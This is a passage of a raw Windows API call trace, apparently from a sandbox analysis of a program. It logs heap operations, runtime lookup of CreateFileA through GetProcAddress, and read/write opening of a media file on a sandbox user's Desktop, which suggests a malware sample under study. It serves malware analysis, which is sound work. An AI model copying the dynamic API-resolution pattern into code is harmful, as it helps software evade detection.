returned 0x76e1c8 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.332] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.332] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.332] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.332] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.332] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0076.332] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.333] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.333] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.334] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.334] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.336] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.336] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.336] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e4e0 [0076.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e4e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0076.337] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.337] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0076.337] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.337] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.337] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4e0 [0076.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0076.337] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.337] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0076.337] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0076.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0076.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", cchWideChar=48, lpMultiByteStr=0x692d08, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpUsedDefaultChar=0x0) returned 48 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.339] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.339] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.339] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7tiqi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.339] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.339] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.339] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=48, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0076.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=48, lpWideCharStr=0x75b7b8, cchWideChar=48 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a") returned 48 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b820 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.340] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.340] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.341] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree 